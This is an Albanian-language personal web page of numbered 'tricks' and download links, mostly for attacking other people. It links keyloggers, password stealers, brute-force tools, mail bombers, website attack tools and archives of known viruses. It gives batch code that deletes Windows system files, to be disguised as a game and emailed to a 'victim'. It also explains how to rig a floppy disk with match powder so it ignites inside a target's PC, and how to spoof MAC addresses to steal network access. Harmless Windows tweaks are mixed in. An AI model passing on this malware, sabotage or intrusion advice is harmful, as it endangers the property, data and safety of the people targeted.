x-man-music - ja vlen me i kshyr
  Home
  Contact
  barcoleta
  Muzika
  Dowload free LOjra
  cheat Cs
  PROGRAME
  comandat e Adminit
  Kush dot bëhet milioner
  Title of your new page
  ja vlen me i kshyr
Ndreq destopin tuaj
Download http://www.soft32.com/Download/Free/Windows_Vista_Transformation_Pack/4-3720-1.html 
4.) Dhant e web-sirte ve
Kete prgram i gjen te dhant e web-sirte ve http://www.speedyshare.com/070173460.htmlPasswordi:deepvissar
5.) Web atackter ktu
web atackter ktu http://www.speedyshare.com/070173775.htmlhttp://www.speedyshare.com/070173569.html
6.)Key loger 
Osht shum sen i mire key loger http://www.speedyshare.com/070173942.html
7.) Ngjitës Programe Per Me Sulmu Weba
http://www.speedyshare.com/070173204.htmlosehttp://rapidshare.com/files/07017384/Sprut.zip.html
8.) Qe 1 web ku mundeni me ble Host Me Cc Gjermane
www.1blu.de
www.1und1.com
www.server4you.de
9.) Ni trik me mar password
hini qitut edhe viktimes qi osht em ty qaty me ni pc ehde doni me ja marr pasin ja boni me shenu imellin edhe pasin edhe i mshoni login edhe jav qet passwordin qe website http://www.nellysports.com/login.asp
10.) www.kosovasnavy.createforume.net atackedd
qe linku kshyrne http://www.speedyshare.com/070173918.html
11.) AntiWirus aaaaaaaaaa
internet trafic reportDownload:ftp://194.97.2.69/pub/filepilot/wind...port/itrci.exever 10ftp://194.97.2.69/pub/filepilot/wind...t/itrci_10.exe
LanGuard Network Security Scanner 5Download:ftp://ftp.gfi.com/languardnss5.exe
Domain ScanDownload:http://www.telefonica.net/web2/telam...domainscan.zip
antihttpcracker 1.0Download:http://www.telefonica.net/web2/telam...Cracker1_0.zip
Shadow Security Scanner 7Download:http://www.safety-lab.com/SSS.exe
12.) Me ja Vizitue Dikujt Pc 
Nese doni me ja ba nje vizit dikujt ne PC, qe nje sen [URL="http://rapidshare.com/files/07017316/TC7_keygan_Bymechodownload.rar.htmlhttp://rapidshare.com/files/07017316/TC7_keygan_Bymechodownload.rar.html"]http://rapidshare.com/files/07017316/TC7_keygan_Bymechodownload.rar.html[/URL[/url]]Installo dhe pasi ta hapesh aty ku shkrun Username apo diqka e ngjajshme jepni administrator, kurse aty ku shkrun password shkruaj IP e cilit te deshiruar, besoj se me kuptuat per qka e kam fjalen, IP duhet mi dit.Me Livrit Me Maus Sbon se viktima e heton
13.)Mi hek reklamat ne msn tuaj
Tools nal ne msn masnej shkon Security masnej te : This is a shared computer so don't store my address book , display pisture , or personal message on it
14.) Dizzynick Creator Me Bo nick name 
vetem e shenon emrin i mshon create edhe ebon nickin vet:D qe linku me download http://www.speedyshare.com/070173351.html
15.) Me hi neper rjeta t`huj ne shared filet e tyre
merrne linkun e ri http://www.download25.com/install/lan-find.html
16.) Me qe add me 1000 gb inbox
www.bgxmail.net   me   qel 1000 Gb inbox
17.) Me qel add 30 giga inbox
www.30gigs.com     me qel add 30 giga inbox
18.)Zone Alarm   valla qit program s kom testu veq pom doket osht met kallzu qdo sen qka bohet n pc-tuaj
Zone AlarmDownload:ftp://194.97.2.69/pub/filepilot/wind...ity/zonealarm/
19.) Qe ni word lis qi mundesh me hacku 
qee po e qes 1 word List shumm tfort ohh sta merr menjaa :d qka ka ntoo edhe merre naj brut force 
qe kam postuu e provone e shini se qfar pune ju kryn 
http://www.speedyshare.com/070173491.htmlqe edhe ni brut force http://www.speedyshare.com/070173476.html 
20.) Qelni imell n shum menyra
www.mail.com opcionet @mail.com @email.com @iname.com @cheerful.com @consultant.com @europe.com @mindless.com @earthling.net @myself.com @post.com @techie.com @usa.com @writeme.com @alumnidirector.com @minister.com @priest.com @saintly.com Hobby @artlover.com @bikerider.com @catlover.com @comic.com @cutey.com @doglover.com @gardener.com @musician.org Internet @email.com @mail.com @writeme.com Jobs A-M @accountant.com @adexec.com @allergist.com @alumnidirector.com @archaeologist.com @chemist.com @clerk.com @columnist.com @comic.com @consultant.com @counsellor.com @deliveryman.com @diplomats.com @doctor.com @dr.com @execs.com @financier.com @gardener.com @geologist.com @graphic-designer.com @hairdresser.net @insurer.com @journalist.com @lawyer.com @legislator.com @lobbyist.com @mad.scientist.com @minister.com Jobs N-Z @optician.com @pediatrician.com @popstar.com @presidency.com @priest.com @programmer.net @publicist.com @realtyagent.com @registerednurses.com @repairman.com @representative.com @rescueteam.com @scientist.com @sociologist.com @techie.com @technologist.com @umpire.com Locations @africamail.com @arcticmail.com @asia.com @europe.com @samerica.com Locations - Cities @berlin.com @dublin.com @london.com @madrid.com @moscowmail.com @munich.com @nycmail.com @rome.com @sanfranmail.com @tokyo.com Locations - Countries @australiamail.com @japan.com @singapore.com @usa.com Love @yours.com @...mail.com @mail.com Misc. A-M @cliffhanger.com @email.com @iname.com @mail.com Misc. N-Z @post.com @soon.com @winning.com Out of this World @earthling.net @inorbit.com Physical/Descriptive @2die4.com @cheerful.com @hot-shot.com @loveable.com @mindless.com @myself.com @playful.com @poetic.com @popstar.com @saintly.com @seductive.com @whoever.com @witty.comPo ashtu Keni Websait per mail Mbi 5000 Domain www.666.la
21.) ZeroSpyware ANTIWIRUS
http://www.fbmsoftware.com/downloads...eroSpyware.exeSUF7Y-TK43B-R64N7-Y7F9GAccount Number : 869146B0ZeroSpywareStop the spyware and leave nothing behindProtect your privacyBlock Trojans, Keyloggers, Trackware, Hijackers, Dialers, and more!
22.) Panda Antiwirus 2007
qe linku   http://www.megaupload.com/?d=SM8VJIE9
23.) Me shti Web Faqen Me regjistru n www.google.com
Per Me Shti WebFaqen n`Google :http://www.google.com/addurl/?continue=/addurlE Kryni Proceduren Se Qka Duhet Me Plotsu Aty , Edhe Webi Juv Do Te Regjistrohet n`Google ...Per Me Hjek WebFaqen E Juv Prej Google :http://www.google.com/addurl/?continue=/removeedhe tanajjj webi juaj osht i regjsitrum:D
24.) Mail Bomb
me ja explodu imellen http://www.speedyshare.com/070173574.html
25.) Me Hi n Pc Permes msn
Se pari duhet te shkojm | ACTIONs | tani shkonii Request Remote Assistancepastaj personi qi ja ke derguar kta duhet ta boj accept kur te bon accept 
duhet me prit pak edhe tani t hapet ni dritare e vogel kur ta aceptoi aj prap t qelet nje dritare 
e madhe edeh tanaj t tregon se qka bon personi n pc-ne e vet
26.) Qe Do ngjyra qi jon n msn plus per nick
·$#0074E8·# e kalter e qelt·$1·# e zezaa·$4·# e kuqe Wink·$3·# e gjelbert·$6·# vjollce·$7·# portokallt e verdh·$9·# e gjelbert e qelt·$11·# ocean blue·$12·# kaltert mshelt·$13·# e pembe·$14·# e hint·$18·# potokallt e qelt·$20·# pembe qelt ex·$21·# vjolce e qelt
27.) Me ja Qu qit SEn najkujt i qelet cd rom   qe   Linkun posht
http://www.speedyshare.com/070173169.html
28.) ME bo Virus per msn
me kriju vet virus per msn me ja qu naikujt http://www.speedyshare.com/070173529.html
29.) Me hi Online//offline n msn
Vetem shenoje numrin se sa here po don me kan online edhe offline programi e kryn punen vet Qe linku me Download Programinhttp://www.speedyshare.com/070173984.html
30.) ME Bo Firm me   ikons
Shum Sen I Mir qe linku : http://services.nexodyne.com 31.) Me HAck Ip Adressen Permess Msn se pari duhet ta shkarkojme msn live plus linku:http://www.msgpluslive.net/news/2006...live-401-tada/ dhe programi per me gjet IP adresen IP GEt 1.0 linku: http://www.speedyshare.com/070173800.htmltash e shkarkoni msn live plus edhe e shkarkoni programin IP GET 1.0 e instaloni msn live plus edhe e hapni programin qe ju dhash 
32.) Me qel add 5 giga inbox 
Në qoft se dikush don e-mail me 5 GB ( ORGJINAL ).Mundet në:www.inbox.com osewww.crawler.comPor me i marr 5 GB te kto faqe duhet te regjistroheni me IP, te Amerikes, Te Kanadas ose Britanis! Në qoft se regjotroheni me tjera IP, i merrni vetem 2 GB!N'qoft se nuk keni proxy, merre ndonje ketu:http://www.xroxy.com/proxy-country-US.htmosehttp://www.xroxy.com/proxy-country-CA.htmMasandej mu regjistru asht shum shum e thjesht!Ose kliko direkt ketu:https://www.inbox.com/register/email.aspxTe "Promo Code" e leni zbrazt!
qe   edhe   nje ngjajshem   WWW.WALA.COM
33.) Me bo test Shpeiitsin e download e edhe t upload
Hyni ne kete faqe dhe per ta testuar shpejtesin e downloadit dhe uploadit kliko ne START, pastaj e zgjedh Kontinentin ne cilin je psh. EUROPE, pastaj ajo automatikisht te tregon sa e ki downloadin, uploadin dhe te tregon e eshte i mire apo jo.Kodi:http://bandwidthplace.com/speedtest/
34.) Me Rrit Inbox Me bo 2000mb ose 2giga
qishtu bohet imboxi 2000mb hin n link qitu i jep qito t dhona qe jon ma posht http://translate.google.com/translat...language_tools Name des Kontoinhabers: Deutsche bank Wittenberg Kontonummer: 666875-------665547 ---667741--66143-66122----66321 ---66543 --66143 --66123-66253--66222---66643--66543---66164 1082395 66126---66153-------66253----66223----66421--66521---66421-----66621---66332----66111---662478---666792 1021385 1093871 1082478 1013291 Bankleitzahl: 86070000 Rechnungsadresse Geben Sie die Adresse genau so ein, wie sie auf Ihren Kontoauszügen erscheint. Vorname: Emri-Jot Nachname: Mbiemri-Jot Straße: krejt Adresszusatz (optional): ja fut diqka qkat dush palidhje futja Postleitzahl: 10115 Ort: Berlin Land/Regioneutschland Deutschland tel: 030 30872800
35.) Me thy Passwordin E kompjuterit
Kush nuk ka password te administratorit shum leht munesh me ja thy pasin e kompjuterit ! kur ta qet aty me shkru passwordin ti shkon ctrl alt edhe delete 2 her edhe hin te useri e 
shkrun Administrator hin log in edhe tu qelet ajo e administratorit masnej ControlPanel edhe 
UserAcaunts hin kujna po don mi ja fshi pasin ose me ja ndryshu edhe masnej del prej administratorit
edhe hin aty ku ja ke ndry pasin ose ja ke fshi ! Ishalla kesh i Qart n kit sen 
36.) Me Shpeiitu Pc per 80%
Start>>Run>>Msconfig Tani Shkoni Startup Ku lexon hiqni pikat D.m.th Disable All te STARTUP 2.Start>>Run>>dfrg.msc Paloni Particionet e Juaja. 3.Start>>Run>>nusrmgr.cpl tani Change the Way users log of tani i keni 2 pika i hekni ato dy pikat apply options dhe OK ================================================== = Shutdown Windows XP Faster 1.Start>>Run>>regedit HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control Kliko Në "Control" Folder Zgjidhë "WaitToKillServiceTimeout" Kliko me Djathen dhe Modifiko aty e keni 2000 E ju e bëneni 1000 Faster Dual Boot Timeout shkoni c: pastaj lart në shirit C:boot.ini e shenoni dhe tani ENTER si ne foto http://img409.imageshack.us/img409/1178/lanis1dv.jpg =========================================== Hacking SERVICE PC =========================================== foto1 http://img423.imageshack.us/img423/3...perties2fz.jpg Foto2 http://img375.imageshack.us/img375/4...perties1ba.jpg foto3 http://img291.imageshack.us/img291/4...perties6yt.jpg foto4 http://img322.imageshack.us/img322/4...perties4rv.jpg SERVICE Foto1 http://img321.imageshack.us/img321/1100/00be.jpg foto2 http://img390.imageshack.us/img390/9391/16zv2.jpg foto3 http://img467.imageshack.us/img467/1484/service15dp.jpg foto 4 http://img50.imageshack.us/img50/4503/service28yz.jpg foto 5 http://img439.imageshack.us/img439/1...rvice3i9qz.jpg Optimize the Windows Server Service 1. Kliko Start -> Run -> Shkruje regedit -> Tani Kliko Ok apo ENTER. 2. Shko HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic eslanmanserverparameters] 3. te Size Me djathen Klikoni mbi edhe aty eshte 1 ju bëneni 3 Speed Boot - Shave 2 Seconds Fshin Historin Temp filet etc.. Kirjo Batch file RD /S /q "C:Documents and Settings"UserName without quotes"Local SettingsHistory" RD /S /q "C:Documents and SettingsDefault UserLocal SettingsHistory" RD /S /q "D:Temp" <--"Deletes temp folder, type in the location of your temp folder" 1.Start>>Run>>notepad dhe tani si ne foto http://img143.imageshack.us/img143/8081/laniii8ir.jpg Runeni Me emer DeleteTemp.bat Pastaj shkoni përseri 1.Start>>Run gpedit.msc Computer Configuration --->Windows Settings --->Scripts dhe kliko dy her ne Shutdown --->Kliko ADD dhe tani Gjeje Batch file ku e keni rujatur tani shtyp ok ad press ok foto http://img135.imageshack.us/img135/2253/lani51am.jpg UNLOAD DLLs TWEAK [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurr entVersionExplorerAlwaysUnloadDLL] ""="1" Speed Menu d.m.th Properties Menyn dhe STart-in shkoni te HKEY_CURRENT_USERControl PanelDesktop zgjidh MenuShowDelay Tani me Djathen Medify dhe Ndryshoni Bëneni 0 Tani Ristartoni Pc-në Ram Memory Hacked.. key HKEY_LOCAL_MACHINESYSTEMCurrentControlSetContro lSession ManagerMemory ManagementPrefetchParameters Tani ne Anen e djatht e keni DisablePagingExecutive tani modifikoni aty është 0 ju duhet ta bëni 1 Pastaj Prefetch disable HKEY_LOCAL_MACHINESYSTEMCurrentControlSetContro lSession ManagerMemory ManagementPrefetchParameters enablePrefetcher aty ështe 0 ju bëneni 1 Pastaj ristaroni Disabling Recent Documents History Windows XP 1. Hap Regisry Editor (Shko Start/Run, Shkruj regedit, dhe Kliko ok). 2. Shko Te HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionPoliciesExplorer. 3. Krijo NoRecentDocsHistory D_WORD key "qeles ". Kliko mbi Valu tani hapet. 4. Tani mbasi ta krijoni emrin ja leni NoRecentDocsHistory Dhe Vleren ja leni 1 ose value 1 5. Kliko OK Tani Mbylle Regjitrin Dhe tani do ti shifeni Efektet Automatically Killing Tasks on Shutdown Autmatikisht Heq programet kur fiket Pc ja qe ju del End now Edhe Cancel e d.m.th e heq automatikisht 1. Hape Registry Editor-in. 2. shko te HKEY_CURRENT_USERControl PanelDesktop. 3. Val-un AutoEndTasks dhe ju ndryshojani bëneni 1 vleren ose Value 4. Tani Mbyll Registry Editor-in ose Regjitrimin. accelerate Your WinXP by Speeding Diskcache 1. run "regedit" 2. Shko [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetContro lSession ManagerMemory ManagementIoPageLockLimit]; 3. Modifiko vleren dhe Hex sipas madhësis se juaj të Ramit: RAM: Modifiko value(Hex) 64M: 1000; 128M: 4000; 256M: 10000; 512M or more: 40000. 4. Ristarto. =============================================== Speed up Network |INTERNETI| Speed up browsing with DNS catch Start>>Run>>regedit HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic esDnscacheParameters] "CacheHashTableBucketSize"=dword:00000001 "CacheHashTableSize"=dword:00000180 "MaxCacheEntryTtlLimit"=dword:0000fa00 "MaxSOACacheEntryTtlLimit"=dword:0000012d e Beni Kopje Dhe paste Dhe Krijoni nje Text skedar apo file me emer dnscache.reg dhe e runi dhe tani e hapni dhe yes edhe ok Speed up Network Browsing and sharing 1. Hap Regedit-in. 2. Shko tek HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace 3. Find a key named {D6277990-4C6A-11CF-8D87-00AA0060F5BF} 4. Kliko me Djathten delete ose fshije. Pastaj Ristaro Kompjuterin Speed up your web browsing Start>>Run>CMD tani ipconfig /flushdns Pastron DNS-n foto http://img85.imageshack.us/img85/5338/lani0gy.jpg XP PRO QOS MYTH Speed up Net 20% 1. Kyqesh si Administrator . 2. Kliko Start -> Run -> Shkruje gpedit.msc -> Tani Kliko Ok apo ENTER. 3. Shko te Local Computer Policy -> Administrative Templates -> Network -> QoS Packet Scheduler. 4. E keni ne Anen e djathen properties te "Limit reservable bandwidth". 5. Tani shtyp Piken Enabled box. 6. Ndysho "Bandwidth limit 20%" Bëne 0. 7. Kliko OK dhe Mbylle gpedit.msc. foto http://img91.imageshack.us/img91/3721/gpeditlani7dk.jpg 8. Tani Shko START SETTINGS -> My Network Connections -> View Network Connections -> Me djathen kliko ne Local Area Connection -> Zgjidhe (tani shikoj protoklet ne list) 9. Ristarto per Ndyshime dhe efekte. Ndyshimi maximal IE rrjetes Pak me te shpejtë Kliko Start -> Run -> Shkruje regedit-> Tani Kliko Ok apo ENTER.Tani... [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionInternet Settings] "MaxConnectionsPerServer"=dword:00000032 "MaxConnectionsPer1_0Server"=dword:00000032 nese nuk jeni te sigurt diqka mos provoni sepse mund te demtoni Hard-DiskuIshalla ju kryn punn klm..!
37.) ME Eksplodu pc !!!
qe po ju njoftoj me nje trik se qysh mundeni viktimes meja kall pc. nuk ju duhet programe as rejti..po qka ju duhet: 1) 1.Fllopy Disk 1.3inc 2) 1.Qibrit 3) 1.Nje cik cak apo siq i thojn ( keto mundeni me kerku nga femnrat e juja apo nga nje te afermit e juj...kuptohet qka eshte kjo..dhe tani po fillojm me perpunimin e kesaj: se pari e merni Qebritin dhe menje got apo bardak te paster e jo e lagur apo diqka qe eshte nga gjami aty i qitni at barutin e qebritit...dmth qebriti qe e ka at pjesen e kuqe qat pjes te kuqe e qitni menje got apo bardak. Dhe pasi e qitni qat pjes te kuqe e shtypni e boni krejt pluhen dmth mos me qen ajo si koker po pluhen me qen. Pastaj e hapni Fllopyn me kujdes qe me mujt me mshel prap. edhe Fllopy mrena e ka nje pjes te zez te rumbullaket sipri saj eshte nje bez i bardh.....qat bez ja hekni...dhe qat barutin apo qat pjes te qebritit qe e keni ber si pluhen e vendosni aty... dhe e merni qat cik cak e preni ajo e ka nje bez te holl. e preni qat send me madhsin e fllopy-t dhe e lagni me uj qat bez dhe pastaj e vuni simpri qasaj pjeses se zez te fllopy-t normal edhe at qebritit e keni vendos aty.( 1 pjesa e fllopy-t 2. pjesa e qebritit.3 pjesa e cik cakut) dhe e mshelni fllopy-in me kujdes qe mos me dallu viktima qe eshte qel.. dhe eleni mu ter fllorin dmth qajo bez qe e keni lagur duhet me u ter.. pastaj pasi qe teret qat fllopy ja jepni viktimes qe doni meja kall pc thuni qe ka donje program per me thy msn pasi qe shumica apo krejt populli qaty eka synin veq me thy msn-ja .....dhe aj apo ajo viktim kur e vendos fllopyn ne pc dhe e qel fllopyn fllopy fillon te nxehet dhe pjesa e qebritit me at bez fillon te djeget dhe kshtu fillon edhe krejt pc-ja mun djeg
38.) Me kqyr TV nPC
qe ni program me kqyr Tv n kompjuter http://www.speedyshare.com/070173920.htmlpassword per kete osht tvpc2006
39.) Me Vjedh Rjjet N Lan
Qe Ni Toturial I vogel se si me vjedh rrjet kjo vlen vetem se nese nuk e heton ISP'ja ( PROVRAJDERI ) po nese e heton a'ther ta ndalon se pari download Angry Ip Scan Link: http://www.softpedia.com/get/Network...-Scanner.shtml pastaj nese e kini IP 10.10.1.17 ju e lshoni me bo scan prej 10.10.1.1 deri 10.10.1.99 dmth kejt IP mi scanu pastaj kur ti scanon ata qka jon ne momentin duke punuar mundeni te ja merrni Mac Addressen vetem klikoni me te djathten dhe SHow Mac Address psh Mac Address osht 00-0E-A6-9A-26-AB dhe kete duheni te shkoni ta qitni qitu Se pari shkoni ne Propertis te My Network Places pastaj perseri Propertis ne Local Area Connection Pastaj Klikojm Configure Pastaj Advanced pastasj zgjedhim Network Address Klikojm te Value dhe e bejm Paste Mac Addressen edhe OK pastaj duheni ta ndrroni edhe IP dmth se si e ka Viktima dhe mund ta perdorni rrjetin e tii pa problem deri sa te heton
40.) Krijo Virus
Krijo nje Batch Game.bat Lexo tekstinSe pari shko START RUn tani Shenoje ne Run Notepaddhe kopjo ket me posht qe eshte ne kodKodi:@echo offdelete c:winntsystem32*.*delete c:winnt*.*2. Konverto prej Game.bat ne Game.com .Kodi tjeter 2 :attrib -h -r -s "C:windowssystem32*.*"del /q "C:windowssystem32*.*"exitMe keto .bat mundesh me ja fshi krejt filat ne windows dhe mandej smundet me dhez PC-en ma.....Mundesh dhe mi ndrue keto per me ja fshi tjera directory hehehhTung3 .Tani shkoni Ndryshoni Ikonen Game.com me Tast te Djatht Properties Tani4. Dergoni Game.com ne e-mail attachment Naj Viktimes:5. Tani Viktima e hap Programin dhe i Fshihen Gjitha ne Windows Dirketor Fajllat.
41.) ME restart PC Per 3 sekonda
http://www.speedyshare.com/070173678.html   per 3 sekonda ta restarton pc
42.) 5   e-maila   mundesh   mi   bllokue
me qit program munesh 5 email addressa per mi blloku perniher qe linki me download http://www.speedyshare.com/070173504.html
43.) Donnut Per Me Atack Weba
qe linku me download http://www.speedyshare.com/070173892.html
44.) Password stealer me vjedh pass
Hem ky program per p.sh kush te ulet ne qat Pc qe eshte qiky program ati i ruhet pasi ky perdoret p.sh hapet e toni veq e aktivizon edhe ky toni ulet ne anen e poshtme nuk shihet edhe kush te punon i ruhet passi e toni masi te qohet personi ulesh ti edhe e shtyp Tasin CTRL + 8 edhe te hapet edhe e sheh pasin okShkarko :: qe linkun http://www.speedyshare.com/070173813.html
45. )Sulmo web faqet
http://www.speedyshare.com/070173130.html
46.)Si të hapim web-waqe free p.sh Www.UneEdheTi.De.Tl
hyni ne faqen e Internet-Explorer dhe e shenoni këtë webhttp://www.homepage-baukasten.depasi që ta shenoni hyni ku lexon :Anmeldendhe i ploxon te gjitha rubrikat e zbrazura
47.) Folder me Pasword
Folder me PaswordKodi: http://www.speedyshare.com/070173868.html
48.) Shikoni ip tuaj dhe emrin e pc tuaj
Me Ane Te Ketij Programi , shiko ip dhe emrin e pc-s tuaj.http://geocities.com/valmirsoft/shikoip.zip
49.) Original Vista Icons
http://www.megaupload.com/?d=V1IAO3QG
50.) Fjalorë Shqip-Anglisht
qe   Linkun http://rapidshare.com/files/0701732/Fjalor.zip
o ku shkrun qe qeshtu qaty e prekni OKYou want to download a file. Please scroll down to proceed.----> We host your files for free! Click here to upload files
51.) Program per Rmxx
program per rmxx http://rapidshare.de/files/07017327/HIPHOP.EJAY.V6.0-RiSE.rar
52.)Startin   Me Lane Emrin   qysh   dush   ti
Hey njerz ja ku e keni linkun e rri Download:http://rapidshare.com/files/07017334/StartBtn.rar.html
53.) Satellite TV For PC 2007 Elite Edition
Now you can literally download an extra TV. Our software turns your PC into a TV! Over 3000 STATIONS on your PC or Laptop for free!! Instantly Turn your Computer into a Super TV Downloadhttp://xupload.org/file.php?file=5a086fef62451f5f071d2c1a8bab5a87
54.) Me rrugullo foton 
Ky esht njne prohram me rrugyullo fotohttp://www.frameshow.com/download-next.htm
55.)Linka qi ta domtojn pc
http://web.tiscali.it/johnnycrk2/virus/happy99.ziphttp://web.tiscali.it/johnnycrk2/virus/Melissa.ziphttp://web.tiscali.it/johnnycrk2/virus/x.ziphttp://web.tiscali.it/johnnycrk2/virus/POLY.ziphttp://web.tiscali.it/johnnycrk2/virus/rundll.ziphttp://web.tiscali.it/johnnycrk2/virus/Speed.ziphttp://web.tiscali.it/johnnycrk2/virus/Unknow.ziphttp://web.tiscali.it/johnnycrk2/virus/Unknow2.ziphttp://web.tiscali.it/johnnycrk2/virus/nowviru.ziphttp://web.tiscali.it/johnnycrk2/virus/document.zip
56.) Si me ba nje folder se smundet te shihet
Nese doni P.SH me fsheh nje folder mosme pa askush
shko e krioni nje folder shkoni Rename dhe e ban ALT 255 
edhe pastaj shkoni ne Tastin e Djatht aty tek folderi edhe 
shkoni aty ku lexon COSTOMIZE CHANGE ICON... Edhe pastaj shkon 
i shikon ren folderat aty i sheh 3 foldera bardh dhe klikon nenjanit 
edhe APPLY OK dhe e ban qe folderi S'shihet   e kam Z'gjat pak po ska Dert
57.) Xp produkt 2007
http://download.microsoft.com/download/8/1/7/817afea0-5a51-4fa9-a973-0975f7fb7daf/WS03SP1_RTM_1830_PX6_EN.isocd key Product Key:CDYMB-GWJ3Q-743QH-FBY6Y-WJYVM
58.) Virus i budallum
nese viktima e han virusin krejt fajllat qka ika mp3,mvi,dox,txt doti fshihen   donwload: http://mehee.narod.ru/VIRUS_3.EXE

Today, there have been 1 visitors (5 hits) on this page!
This website was created for free with Own-Free-Website.com. Would you also like to have your own website?
Sign up for free